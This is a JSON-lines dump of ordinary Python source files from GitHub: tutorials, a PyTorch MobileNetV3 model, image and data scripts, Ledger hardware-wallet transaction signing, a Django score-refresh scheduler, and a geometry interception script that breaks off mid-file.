+{"seq_id":"10334316494","text":"#funcoes\n\npreco = 19.90\n\nimposto = preco * 0.05\nprint(imposto)\n\npreco2 = 100\nimposto2 = preco2 * 0.05\nprint(imposto2)\n\n#criar funcao calcularImposto() que calcula um imposto de 5% e retorna a quem pediu\ndef calcularImposto(preco):\n imposto = preco * 0.07\n return imposto\n\npreco = 299\nimposto = calcularImposto(preco)\nprint(imposto)\n\nvalores = [1.99, 24.50, 78.27, 1515.50]\n#se eu quiser calcular o imposto destes quatro valores\nfor valor in valores:\n print(\"O imposto de {} é {}\".format(valor, calcularImposto(valor)))\n\n#declarar uma funcao calcularImpostoAliquota que recebe dois parametros: o preco do produto e a aliquota de imposto a ser aplicada e retorna o imposto calculado. Se a aliquota nao for informada, utilize 7% como padrao\ndef calcularImpostoAliquota(valor, aliquota = 7):\n imposto = valor * (aliquota /100)\n return imposto\n\nprint(\"\\n\")\nfor valor in valores:\n print(\"O imposto de {} é {}\".format(valor, calcularImpostoAliquota(valor, 12)))","repo_name":"SouzaMth/AnimaCursoExtensaoPython2022-2","sub_path":"aula3-2022-11-09b.py","file_name":"aula3-2022-11-09b.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33041061032","text":"import math\nimport torch\nimport torch.nn as nn\nfrom torch.hub import load_state_dict_from_url\n\n__all__ = ['MobileNetV3_Large']\n\nmodel_urls = {\n #currently hadn't found a pretrained weight\n 'MobileNetV3_Large': None,\n}\ndef _make_divisible(v, divisor, min_value=None):\n \"\"\"\n This function is taken from the original tf repo.\n It ensures that all layers have a channel number that is divisible by 8\n It can be seen here:\n https://github.com/tensorflow/models/blob/master/research/slim/nets/mobilenet/mobilenet.py\n :param v:\n :param divisor:\n :param min_value:\n :return:\n \"\"\"\n if min_value is None:\n min_value = divisor\n new_v = max(min_value, int(v + divisor / 2) // divisor * divisor)\n # Make sure that round down does not go down by more than 10%.\n if new_v < 0.9 * v:\n new_v += divisor\n return new_v\n\nclass SELayer(nn.Module):\n def __init__(self, channel, reduction=4):\n super(SELayer, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.fc = nn.Sequential(\n nn.Linear(channel, _make_divisible(channel // reduction, 8)),\n nn.ReLU(inplace=True),\n nn.Linear(_make_divisible(channel // reduction, 8), channel),\n h_sigmoid()\n )\n\n def forward(self, x):\n b, c, _, _ = x.size()\n y = self.avg_pool(x).view(b, c)\n y = self.fc(y).view(b, c, 1, 1)\n return x * y\n \nclass h_sigmoid(nn.Module):\n def __init__(self, inplace=True):\n super(h_sigmoid, self).__init__()\n self.relu = nn.ReLU6(inplace=inplace)\n\n def forward(self, x):\n return self.relu(x + 3) / 6\n\n\nclass h_swish(nn.Module):\n def __init__(self, inplace=True):\n super(h_swish, self).__init__()\n self.sigmoid = h_sigmoid(inplace=inplace)\n\n def forward(self, x):\n return x * self.sigmoid(x) \n\ndef conv_3x3_bn(inp, oup, stride):\n return nn.Sequential(\n nn.Conv2d(inp, oup, 3, stride, 1, bias=False),\n nn.BatchNorm2d(oup),\n h_swish()\n )\n\n\ndef conv_1x1_bn(inp, oup):\n return nn.Sequential(\n nn.Conv2d(inp, oup, 1, 1, 0, bias=False),\n nn.BatchNorm2d(oup),\n h_swish()\n ) \n\nclass InvertedResidual(nn.Module):\n def __init__(self, inp,hidden_dim, oup, kernel_size, stride, use_se, use_hs):\n super(InvertedResidual, self).__init__()\n\n assert stride in [1, 2]\n\n if inp == hidden_dim:\n self.branch = nn.Sequential(\n # dw conv\n nn.Conv2d(hidden_dim, hidden_dim, kernel_size, stride, (kernel_size - 1) // 2, groups=hidden_dim, bias=False),\n nn.BatchNorm2d(hidden_dim),\n h_swish() if use_hs else nn.ReLU(inplace=True),\n # Squeeze-and-Excite\n SELayer(hidden_dim) if use_se else nn.Identity(),\n # pw-linear\n nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False),\n nn.BatchNorm2d(oup),\n )\n\n else:\n self.branch = nn.Sequential(\n # pw\n nn.Conv2d(inp, hidden_dim, 1, 1, 0, bias=False),\n nn.BatchNorm2d(hidden_dim),\n h_swish() if use_hs else nn.ReLU(inplace=True),\n # dw\n nn.Conv2d(hidden_dim, hidden_dim, kernel_size, stride, (kernel_size - 1) // 2, groups=hidden_dim, bias=False),\n nn.BatchNorm2d(hidden_dim),\n # Squeeze-and-Excite\n SELayer(hidden_dim) if use_se else nn.Identity(),\n h_swish() if use_hs else nn.ReLU(inplace=True),\n # pw-linear\n nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False),\n nn.BatchNorm2d(oup),\n )\n\n self.downsample = nn.Sequential(\n nn.Conv2d(inp, oup, kernel_size = 1, stride = stride , bias=False),\n nn.BatchNorm2d(oup),\n )\n\n self.identity = stride == 1 \n\n\n def forward(self, x):\n if self.identity:\n downsampx = self.downsample(x)\n return downsampx + self.branch(x)\n else:\n return self.branch(x)\n\n\nclass MobileNetV3(nn.Module):\n def __init__(self, stages_out_channels, num_classes=1000, width_mult=1.):\n super(MobileNetV3, self).__init__()\n\n if len(stages_out_channels) != 16:\n raise ValueError('expected stages_out_channels as list of 15 positive ints')\n self._stage_out_channels = stages_out_channels\n\n self.klist = [3,3,3,5,5,5,3,3,3, 3,3,3,5,5,5]\n self.tlist = [1,4,3,3,3,3,6,2.5, 2.3,2.3,6,6,6,6,6]\n self.slist = [1,2,1,2,1,1,2, 1, 1, 1, 1,1,2,1,1]\n self.selist = [0,0,0,1,1,1,0,0, 0, 0, 1,1,1,1,1]\n self.hslist = [0,0,0,0,0, 0,1,1,1, 1, 1,1,1,1,1]\n \n\n input_channels = 3\n output_channels = self._stage_out_channels[0] # 16\n #output_channels = _make_divisible(output_channels * width_mult, 4 if width_mult == 0.1 else 8)\n\n self.conv1 = conv_3x3_bn(input_channels, output_channels, 2)\n input_channels = output_channels\n\n \n stage_names = ['stage{}'.format(i) for i in range(2,17)]\n for name, output_channels,k, t, s ,use_se,use_hs in zip(\n stage_names, self._stage_out_channels[1:], self.klist, self.tlist, self.slist, self.selist, self.hslist):\n seq = []\n output_channels = _make_divisible(output_channels * width_mult, 8)\n exp_size = _make_divisible(input_channels * t, 8)\n seq.append(InvertedResidual(input_channels, exp_size, output_channels, k, s, use_se, use_hs))\n setattr(self, name, nn.Sequential(*seq))\n input_channels = output_channels\n \n\n\n\n def forward(self, x):\n x = self.conv1(x)\n c2 = self.stage2(x)\n c3 = self.stage3(c2)\n c4 = self.stage4(c3)\n c5 = self.stage5(c4)\n c6 = self.stage6(c5) \n c7 = self.stage7(c6)\n c8 = self.stage8(c7)\n c10 = self.stage9(c8)\n\n c11 = self.stage10(c10)\n c12 = self.stage11(c11)\n c13 = self.stage12(c12)\n c14 = self.stage13(c13)\n c15 = self.stage14(c14) \n c16 = self.stage15(c15)\n c17 = self.stage16(c16)\n\n return c3, c5, c16, c17\n \n\n \ndef _mobilenetv3(arch, pretrained, progress, *args, **kwargs):\n model = MobileNetV3(*args, **kwargs)\n\n if pretrained:\n model_url = model_urls[arch]\n if model_url is None:\n raise NotImplementedError('pretrained {} is not supported as of now'.format(arch))\n else:\n state_dict = load_state_dict_from_url(model_url, progress=progress)\n model.load_state_dict(state_dict,strict=False)\n\n return model\n\n\ndef MobileNetV3_Large(pretrained=False, progress=True, **kwargs):\n \"\"\"\n Constructs a ShuffleNetV2 with 0.5x output channels, as described in\n `\"ShuffleNet V2: Practical Guidelines for Efficient CNN Architecture Design\"\n `_.\n\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n progress (bool): If True, displays a progress bsar of the download to stderr\n \"\"\"\n return _mobilenetv3('MobileNetV3_Large', pretrained, progress,\n [16,16,24,24,40,40,40,80, 80, 80, 80, 112,112,160,160,160], **kwargs)","repo_name":"eddie0509tw/Dbnet","sub_path":"models/modules/mobilenetv3.py","file_name":"mobilenetv3.py","file_ext":"py","file_size_in_byte":7428,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"1930769873","text":"import os\nimport argparse\nimport numpy as np\nfrom skimage.transform import resize\nfrom skimage.io import imread, imsave\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--input_folder', type=str, required=True)\n parser.add_argument('--output_folder', type=str, required=True)\n parser.add_argument('--output_height', type=int, required=True)\n parser.add_argument('--output_width', type=int, required=True)\n\n return parser.parse_args()\n\n\ndef resize_image(image, height, width):\n resized_image = resize(image, (height, width), anti_aliasing=True)\n resized_image = np.round(resized_image * 255.0).astype(np.uint8)\n return resized_image\n\n\nif __name__ == '__main__':\n args = get_args()\n files_list = os.listdir(args.input_folder)\n for filename in files_list:\n print(filename)\n image = imread(os.path.join(args.input_folder, filename))\n resized_image = resize_image(image, args.output_height, args.output_width)\n imsave(os.path.join(args.output_folder, filename), resized_image)","repo_name":"vsbaldeev/dogs-vs-cats","sub_path":"data_resizer.py","file_name":"data_resizer.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"45497186885","text":"\"\"\"\nAn example of how to use encore.\n\nSteps:\n0) Add a path to encore to your python path.\n\n1) Define the DM particle mass and the spatial edges of the snapshot.\n\n2) Create an Encore object with a path to the output, the particle mass,\nand (optional) specify whether you want jackknifing.\n\n3) Reduce the halo catalog to halos you want, downsample dark matter\nparticles, jackknife the dark matter particles.\n\n4) Compute things you want, such as the mass function or\ncorrelation functions. To accomplish the latter you\nneed to create random catalogs.\n\"\"\"\n\n#Step 0\nimport sys\nsys.path.insert(0,\"../Encore/\")\nimport encore\n\n#Step 1\nparticle_mass = 3.98769e10 #Msun/h\nedges = [0.0,1050.0] #Mpc/h; spatial edges of the snapshot\n\n#Step 2\nDSdmpath = \"./output/\"\nrandompath = DSdmpath\nreducedhalopath = \"../encore_scratch/\"\nmy_encore = encore.encore(outpath=\"./output/\",randompath=randompath,\n DSdmpath=DSdmpath,reducedhalopath=reducedhalopath,\n particle_mass=particle_mass,do_JK=True)\n\n#Step 3\nmy_encore.reduce_halo_catalogs() #Already done\n#my_encore.down_sample_dm() #Already done\n#my_encore.jackknife_dm()\n\n#Step 4\n#my_encore.compute_mass_function(do_JK=True)\n#my_encore.create_random_catalogs(edges,N=800000) #Comment this out once it is run one time\nmy_encore.compute_hhcf(edges,do_JK=True)\n#You can also define your own radial bins\n#Note: more bins and smaller scales means a longer run time\nlimits = [0.1,50.0]\nnbins = 20\n#my_encore.compute_hmcf(edges,nbins=nbins,limits=limits,do_JK=False)\n","repo_name":"tmcclintock/Encore","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"35532525590","text":"gear = []\nfor i in range(4):\n x = list(map(int, input()))\n gear.append(x)\nk = int(input())\ncmds = []\nfor i in range(k):\n n, direction = map(int, input().split())\n cmds.append([n, direction])\n\n\ndef rotate(gear, chk):\n if chk:\n return [gear[-1]] + gear[0:-1] # Clockwise Turn\n else:\n return gear[1:] + [gear[0]] # Counter Clockwise Turn\n\n\nfor cmd in cmds:\n dir = [0] * 4\n num = cmd[0] - 1\n if cmd[1] == 1:\n dir[num] = 1\n else:\n dir[num] = -1\n\n for i in reversed(range(num)):\n if gear[i][2] != gear[i + 1][6]:\n dir[i] = (-1) * dir[i + 1]\n else:\n break\n\n for i in range(num + 1, 4):\n if gear[i - 1][2] != gear[i][6]:\n dir[i] = (-1) * dir[i - 1]\n else:\n break\n\n for i in range(4):\n if dir[i] == 0:\n continue\n elif dir[i] == 1:\n gear[i] = rotate(gear[i], True)\n elif dir[i] == -1:\n gear[i] = rotate(gear[i], False)\n\n\nscore = gear[0][0] * 1 + gear[1][0] * 2 + gear[2][0] * 4 + gear[3][0] * 8\nprint(score)","repo_name":"wk1219/Algorithm-Prob","sub_path":"Baekjoon/Step_prob/Implementation_prob/baekjoon-14891.py","file_name":"baekjoon-14891.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"28729066355","text":"from riemann import tx\nfrom riemann import utils as rutils\n\nfrom ledger import blue, utils\n\nfrom typing import cast, List, Optional, Tuple\nfrom ledger.ledger_types import LedgerXPub, PrevoutInfo\n\n# https://ledgerhq.github.io/btchip-doc/bitcoin-technical-beta.html\n\n\nSIGHASH_ALL = tx.shared.SIGHASH_ALL\n\n\ndef _parse_public_key_response(response: bytes) -> LedgerXPub:\n '''\n Parse the Ledger's serializied key response into a data structure\n '''\n pubkey_len = response[0]\n pubkey = response[1:1 + pubkey_len]\n address = response[1 + pubkey_len + 1:-32]\n chain_code = response[-32:] # last 32 are chain_code\n return LedgerXPub(\n pubkey=bytes(pubkey),\n address=address.decode('utf8'),\n chain_code=bytes(chain_code))\n\n\nasync def get_key_info(client: blue.Ledger, derivation: str) -> LedgerXPub:\n '''\n This corresponds to the GET WALLET PUBLIC KEY command\n It asks the ledger for the key at a derivation path\n Args:\n derivation (str): the derivatoin path string\n Returns:\n (LedgerXPub): The parsed public key with type, address and chain_code\n '''\n # first we get the path into a form that the ledger can understand\n deriv_indices = utils.parse_derivation(derivation)\n\n # make the apdu formatted request body\n derivation_data = blue.derivation_path_to_apdu_data(deriv_indices)\n pubkey_req_apdu = blue.make_apdu(\n command=b'\\x40',\n data=derivation_data,\n p2=b'\\x02') # native segwit address\n\n # It comes in a blob with chaincode and address\n pubkey_response = await client.exchange(pubkey_req_apdu)\n\n # return the parsed response\n pubkey = _parse_public_key_response(pubkey_response)\n return pubkey\n\n\nasync def get_uncompressed_public_key(\n client: blue.Ledger, derivation: str) -> bytes:\n '''Get the public key for a derivation'''\n pubkey = await get_key_info(client, derivation)\n return pubkey['pubkey']\n\n\nasync def get_xpub(\n client: blue.Ledger,\n derivation: str,\n mainnet: bool = True) -> str:\n '''\n Gets the xpub at a derivation path\n '''\n if derivation == 'm':\n parent = None\n else:\n # this looks like magic, but just pops the last derivation off\n parent_derivation = '/'.join(derivation.split('/')[:-1])\n parent = await get_key_info(client, parent_derivation)\n\n child = await get_key_info(client, derivation)\n\n # make the xpub for the child and instantiate an object\n xpub = utils.make_child_xpub(derivation, parent, child, mainnet)\n return xpub\n\n\ndef _transaction_start_packet(chunk: bytes) -> bytes:\n '''make UNTRUSTED HASH TRANSACTION INPUT START beginning apdu'''\n return blue.make_apdu(\n command=b'\\x44',\n p1=b'\\x00',\n p2=b'\\x02',\n data=chunk)\n\n\ndef _transaction_continue_packet(chunk: bytes) -> bytes:\n '''make UNTRUSTED HASH TRANSACTION INPUT START continuation apdu'''\n return blue.make_apdu(\n command=b'\\x44',\n p1=b'\\x80',\n p2=b'\\x02',\n data=chunk)\n\n\ndef _output_continue_packet(chunk: bytes) -> bytes:\n '''UNTRUSTED HASH TRANSACTION INPUT FINALIZE FULL non-final packet'''\n return blue.make_apdu(\n command=b'\\x4a',\n data=chunk)\n\n\ndef _output_final_packet(chunk: bytes) -> bytes:\n '''UNTRUSTED HASH TRANSACTION INPUT FINALIZE FULL last packet'''\n return blue.make_apdu(\n command=b'\\x4a',\n p1=b'\\x80',\n data=chunk)\n\n\ndef _packetize_version_and_vin_length(t: tx.Tx) -> bytes:\n '''The first packet sent to UNTRUSTED HASH TRANSACTION INPUT START'''\n # will break on bullshit like non-compact VarInts\n chunk = t.version + tx.VarInt(len(t.tx_ins)).to_bytes()\n return _transaction_start_packet(chunk)\n\n\ndef _packetize_input(tx_in: tx.TxIn, prevout_info: PrevoutInfo) -> List[bytes]:\n '''Turn an input into a set of packets for tx prep'''\n if tx_in.script_sig != b'':\n raise NotImplementedError('Only native SegWit')\n le_value = rutils.i2le_padded(prevout_info['value'], 8)\n\n chunks = []\n\n # 02 for segwit, then the outpoint,\n # then the I64 value, then 0 for len(script)\n chunks.append(b'\\x02' + tx_in.outpoint.to_bytes() + le_value + b'\\x00')\n chunks.append(tx_in.sequence)\n\n return [_transaction_continue_packet(chunk) for chunk in chunks]\n\n\ndef _packetize_input_for_signing(\n tx_in: tx.TxIn,\n prevout_info: PrevoutInfo) -> List[bytes]:\n '''Turn an input into a set of packets for the last step of signing'''\n chunks = []\n if prevout_info['witness_script'] is None:\n raise ValueError('Packet for signing must have a script')\n script = cast(bytes, prevout_info['witness_script'])\n le_value = rutils.i2le_padded(prevout_info['value'], 8)\n\n script_len_bytes = tx.VarInt(len(script)).to_bytes()\n\n # the first packt is the outpoint and value\n chunks.append(b'\\x02' # 02 is ledger-speak for segwit input\n + tx_in.outpoint.to_bytes()\n + le_value\n + script_len_bytes)\n\n # Chunk into 50-byte chunks\n chunks.extend([script[i:i + 50] for i in range(0, len(script), 50)])\n\n # append the sequence to the last one\n chunks[-1] = chunks[-1] + tx_in.sequence\n\n return [_transaction_continue_packet(chunk) for chunk in chunks]\n\n\ndef _packetize_vout(tx_outs: Tuple[tx.TxOut, ...]) -> List[bytes]:\n '''Converts the output vector into apdu packets'''\n # first get the whole length-prefixed vector\n data_to_be_chunked = bytearray()\n data_to_be_chunked.extend(tx.VarInt(len(tx_outs)).to_bytes())\n for tx_out in tx_outs:\n data_to_be_chunked.extend(tx_out.to_bytes())\n\n # chunk it into 50 byte chunks\n chunks = [data_to_be_chunked[i:i + 50] # chunk the data\n for i in range(0, len(data_to_be_chunked), 50)]\n\n # make continue packets for all but the last one\n packets = []\n packets.extend([_output_continue_packet(chunk) for chunk in chunks[:-1]])\n\n # the last one is a final packet\n packets.append(_output_final_packet(chunks[-1]))\n\n # return all the apdu packets\n return packets\n\n\ndef _transaction_final_packet(\n lock_time: bytes,\n path: List[int],\n sighash_type: int) -> bytes:\n '''\n UNTRUSTED HASH SIGN packet with locktime and sighash type\n This packet actually requests the sig\n\n Args:\n lock_time (bytes): 4 byte LE-encoded locktime field\n path (List[int]): list of derivation indices\n sighash_type (int): bitcoin consensus sighash type. NONE not supported\n Returns:\n (bytes): the apdu packet\n '''\n data = bytearray()\n data.extend(blue.derivation_path_to_apdu_data(path)) # derivation info\n data.extend(b'\\x00') # user validation code ??\n data.extend(lock_time)\n data.append(sighash_type)\n return blue.make_apdu(\n command=b'\\x48',\n data=data)\n\n\nasync def _get_sig(\n client: blue.Ledger,\n first_packet: bytes,\n last_packet: bytes,\n tx_in: tx.TxIn,\n prevout_info: PrevoutInfo) -> bytes:\n '''\n Gets a signature for an input\n Args:\n first_packet (bytes): the first packet e0440000... (input start)\n last_packet (bytes): the last packet e0480000... (hash sign)\n tx_in (tx.TxIn): the transaction input\n prevout_info (PrevoutInfo): the script and value of the prevout\n Returns:\n (bytes): the signature, unmasked\n '''\n # for convenience, we do surgery on the packet\n # yes, this is messy. but it's way more straightforward than\n # setting p1 and p2 to 0x0080 means this is a new pseudo-tx continuation\n # setting the second-to-last to 1 to overwrite len(vin)\n first_packet = (first_packet[0:2]\n + b'\\x00\\x80' # overwrite p1+p2\n + first_packet[4:-2]\n + b'\\x01' # overwrite len(vin)\n + first_packet[-1:])\n\n # they need to be packetized with their witness script\n input_packets = _packetize_input_for_signing(tx_in, prevout_info)\n\n # Send all the packets and the sig-request packet\n await client.exchange(first_packet)\n for packet in input_packets:\n await client.exchange(packet)\n response = await client.exchange(last_packet) # request the sig\n\n # unmask the sig before we return it\n return _unmask_sig(response)\n\n\ndef _signable(\n key: bytes,\n prevout_info: PrevoutInfo) -> bool:\n '''\n Determines if the key or its hash is in the PrevoutInfo\n We use this to determine whether we should get a signature for an input\n\n Args:\n key (bytes): the public key\n prevout_info (PrevoutInfo): dict of script and value for the prevout\n Returns:\n (bool): True if signable, false otherwise\n '''\n if len(key) in [64, 65]:\n key = utils.compress_pubkey(key) # enforce compression\n\n # if there's no script, it's not signable\n if prevout_info['witness_script'] is None:\n return False\n\n # if the key is anywhere in the script, it is signable\n script = cast(bytes, prevout_info['witness_script'])\n if (key in script or rutils.hash160(key) in script):\n return True\n\n return False\n\n\ndef _unmask_sig(sig: bytes) -> bytes:\n '''Ledger masks the first byte with 0xFE. We need to remove the mask'''\n first_byte = sig[0] & 0xfe\n sig = bytes([first_byte]) + sig[1:]\n return sig\n\n\nasync def get_tx_signatures(\n client: blue.Ledger,\n t: tx.Tx,\n prevouts: List[PrevoutInfo],\n derivation: str,\n sighash_type: int = SIGHASH_ALL) -> List[Optional[bytes]]:\n '''\n Sign a transaction\n Args:\n client (Ledger): the Ledger context manager object\n t (tx.Tx): The transaction to sign\n prevouts (List[PrevoutInfo]): value for each Prevout\n must include the script if we intend to sign the input\n script must NOT be length-prefixed (e.g. 76a914... NOT 1976a914...)\n derivation (str): m-prefixed derication for the signing key\n sighash_type (int): Bitcoin-consensus sighash type, ledger\n firmware currently only supports ALL\n Returns:\n List[Optional[bytes]]: For each input, either a signature or None\n '''\n if len(prevouts) != len(t.tx_ins):\n raise ValueError('mismatch between txins and prevouts')\n\n if sighash_type != SIGHASH_ALL:\n raise ValueError('ledger firmware only supports SIGHASH_ALL')\n\n # Let's get the key so we can scan scripts for it\n key = await get_uncompressed_public_key(client, derivation)\n\n # start by packetizing version and len(vin)\n first_packet = _packetize_version_and_vin_length(t)\n packets = [first_packet] # collect a list of packets for sending later\n\n # packetize each input\n for pair in zip(t.tx_ins, prevouts):\n packets.extend(_packetize_input(*pair))\n\n # packetize the whole vout\n packets.extend(_packetize_vout(t.tx_outs))\n\n # send all vin/vout packets\n for packet in packets:\n await client.exchange(packet)\n\n # calculate the request packet\n indices = utils.parse_derivation(derivation)\n last_packet = _transaction_final_packet(t.lock_time, indices, sighash_type)\n\n # build sigs. If we're not signing the input, return None at its index\n sigs = []\n for pair in zip(t.tx_ins, prevouts):\n sigs.append(await _get_sig(client, first_packet, last_packet, *pair)\n if _signable(key, pair[1])\n else None)\n\n return sigs\n","repo_name":"summa-tx/riemann-ledger","sub_path":"ledger/btc.py","file_name":"btc.py","file_ext":"py","file_size_in_byte":11636,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"} +{"seq_id":"35659560838","text":"# Adapted from https://pypi.org/project/django-apscheduler/\n\nfrom ...LiveScore_Requests import list_by_date\n\nimport logging\n\nfrom django.conf import settings\n\nfrom apscheduler.schedulers.blocking import BlockingScheduler\nfrom apscheduler.triggers.cron import CronTrigger\nfrom django.core.management.base import BaseCommand\nfrom django_apscheduler.jobstores import DjangoJobStore\nfrom django_apscheduler.models import DjangoJobExecution\nfrom django_apscheduler import util\n\nfrom datetime import datetime, timedelta\nfrom django.utils import timezone\n\nlogger = logging.getLogger(__name__)\n\n\ndef refresh_live_scores():\n # now = datetime.now()\n # this is in GMT\n now = timezone.now()\n day = now.strftime(\"%Y%m%d\")\n hour = now.strftime(\"%H\")\n\n print(\"Now: \", now)\n print(\"Executed refresh_live_scores command at \", day)\n print(\"Hour: \", hour)\n\n # 5 calls every 12 hours,\n # 6 more single day calls every 3 hours\n # 16 total API calls per day\n \n if hour == \"00\" or hour == \"12\":\n # loop to call previous 1 days through next 3 days\n call_list = [now - timedelta(days=x) for x in range(-3, 2)]\n for date in call_list:\n formattedDate = date.strftime(\"%Y%m%d\")\n print(formattedDate)\n # LiveScore_Request\n list_by_date(formattedDate)\n else:\n print(day)\n # LiveScore_Request\n list_by_date(day)\n \n print(\"End of scheduled API call\") \n \n \n \n\n\n\n# The `close_old_connections` decorator ensures that database connections, that have become\n# unusable or are obsolete, are closed before and after your job has run. You should use it\n# to wrap any jobs that you schedule that access the Django database in any way. \n@util.close_old_connections\ndef delete_old_job_executions(max_age=604_800):\n \"\"\"\n This job deletes APScheduler job execution entries older than `max_age` from the database.\n It helps to prevent the database from filling up with old historical records that are no\n longer useful.\n \n :param max_age: The maximum length of time to retain historical job execution records.\n Defaults to 7 days.\n \"\"\"\n DjangoJobExecution.objects.delete_old_job_executions(max_age)\n\n\nclass Command(BaseCommand):\n help = \"Runs APScheduler.\"\n\n def handle(self, *args, **options):\n scheduler = BlockingScheduler(timezone=settings.TIME_ZONE)\n scheduler.add_jobstore(DjangoJobStore(), \"default\")\n\n scheduler.add_job(\n refresh_live_scores,\n trigger=CronTrigger(hour=\"*/3\"), # Every 3 hours\n # trigger=CronTrigger(second=\"*/10\"), # Every 10 seconds\n # trigger=CronTrigger(minute=\"*/2\"), # Every 2 minutes\n id=\"refresh_live_scores\", # The `id` assigned to each job MUST be unique\n max_instances=1,\n replace_existing=True,\n )\n logger.info(\"Added job 'refresh_live_scores'.\")\n\n scheduler.add_job(\n delete_old_job_executions,\n trigger=CronTrigger(\n day_of_week=\"mon\", hour=\"00\", minute=\"00\"\n ), # Midnight on Monday, before start of the next work week.\n id=\"delete_old_job_executions\",\n max_instances=1,\n replace_existing=True,\n )\n logger.info(\n \"Added weekly job: 'delete_old_job_executions'.\"\n )\n\n try:\n logger.info(\"Starting scheduler...\")\n scheduler.start()\n except KeyboardInterrupt:\n logger.info(\"Stopping scheduler...\")\n scheduler.shutdown()\n logger.info(\"Scheduler shut down successfully!\")","repo_name":"dwindleduck/no-spoilers-tennis-server","sub_path":"tennis/management/commands/refresh_LiveScore.py","file_name":"refresh_LiveScore.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8384472619","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Nov 23 21:56:41 2020\r\n\r\n@author: Nagnanamus\r\n\"\"\"\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pickle as pkl\r\n\r\nfilepath = \"../houseScan.pkl\"\r\nwith open(filepath,'rb') as fh:\r\n ptsdata = pkl.load(fh)\r\n \r\nfor idx in range(5):\r\n fig,ax = plt.subplots(1, 1)\r\n\r\n rngs = np.array(ptsdata[idx]['ranges'])\r\n \r\n angle_min=ptsdata[idx]['angle_min']\r\n angle_max=ptsdata[idx]['angle_max']\r\n angle_increment=ptsdata[idx]['angle_increment']\r\n ths = np.arange(angle_min,angle_max+angle_increment,angle_increment)\r\n p=np.vstack([np.cos(ths),np.sin(ths)])\r\n \r\n \r\n ptset = rngs.reshape(-1,1)*p.T\r\n \r\n safeptsidx = (rngs<=ptsdata[idx]['range_max']) & (rngs>=ptsdata[idx]['range_min'])\r\n ptset = ptset[safeptsidx,:]\r\n \r\n ax.plot(ptset[:,0],ptset[:,1],'bo')\r\n","repo_name":"nadurthi/ResearchCodes","sub_path":"plotscans.py","file_name":"plotscans.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23942305577","text":"import numpy as np\nfrom numpy import linalg as LA\nfrom math import *\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom random import random\nfrom scipy.signal import argrelextrema\n\nOBS_TIME = 40\nstep = pi / 250\n\n\ndef main():\n # Create a figure with two subplots\n fig = plt.figure(figsize=(10, 5))\n # Add the first subplot (3D plot)\n ax = fig.add_subplot(121, projection='3d')\n # Add the second subplot (2D plot)\n ax2 = fig.add_subplot(122)\n\n # Pick random configuration until it finds desired one\n while (1):\n # TS\n Origin = np.array([random() * 10 - 5, random() * 10 - 5, 0])\n Speed = random() * 5 + 0.5\n Heading = 2 * pi * random() - pi\n Direction = np.array([Speed * cos(Heading), Speed * sin(Heading), 1])\n # OS\n OS_Speed = random() * 5 + 0.5\n\n points = getIntersectionTime_new(Origin, Direction, OS_Speed)\n\n if len(points) > 0:\n # Desired config\n \"\"\"OS_Speed >= Speed and len(points) > 1 and\"\"\"\n all_positives = True\n for p in points:\n if p[0] < 0:\n all_positives = False\n if all_positives:\n break\n else:\n print(\"NO\")\n\n ax = SetUpPlot(Origin, OS_Speed, Direction, fig, ax)\n # Print data\n print(\"\\nTS \\n Origin: \", Origin[0], \" \", Origin[1], \"\\n Heading: \", Heading, \"/\", round(Heading/pi*180,2), \"\\n Speed: \", Speed)\n print(\"OS \\n Speed: \", OS_Speed, '\\n')\n\n print(\"\\nNew method results\")\n print(\" Cone interception in \", len(points), \" points.\")\n count = 0\n for point in points:\n ax = PlotPath(ax, np.array([0, 0, 0]), point[1], count + 1)\n #print(atan2(point[1][1],point[1][0]))\n print_pos(point, OS_Speed, Direction, Origin, False)\n count = count + 1\n poss = np.array([p[1] for p in points])\n ax.set_zlim(np.min(np.concatenate(poss)) - 10, np.max(np.concatenate(poss)) + 10)\n ax.legend()\n\n # Brute force\n print(\"\\nBrute force results\")\n thetas = np.arange(-pi, pi, 0.01)\n dists = np.array([])\n for theta in thetas:\n t = Origin[0] / (OS_Speed * cos(theta) - Speed * cos(Heading))\n distance = distance_t(t, OS_Speed, theta, Direction, Origin)\n dists = np.append(dists, distance)\n ax2.scatter(theta, distance, color='red')\n # Find the indices of local minima in the first values array\n min_dists = argrelextrema(dists, np.less)\n # Extract the corresponding tuples for the local minima\n thetas_min_dists = [thetas[index] for index in min_dists[0]]\n for theta in thetas_min_dists:\n t = Origin[0] / (OS_Speed * cos(theta) - Speed * cos(Heading))\n p = Origin + t * Direction\n #if t<0:\n #print(\" atan2 _ \", pi+atan2(p[1], p[0]) % 2*pi)\n # print(\" acos _ \", acos((Origin[0]+Speed*cos(Heading))/(OS_Speed*t)))\n point = [t, p, theta]\n print_pos(point, OS_Speed, Direction, Origin, True)\n\n ax.set_title('OS speed cone - TS interception')\n ax2.set_title('Distance TS-OS at interception time for each theta')\n ax2.set_xlabel(\"theta\")\n ax2.set_ylabel(\"distance\")\n ax2.set_ylim([0, 10])\n\n # Old method\n print(\"\\nOld method results\")\n points = 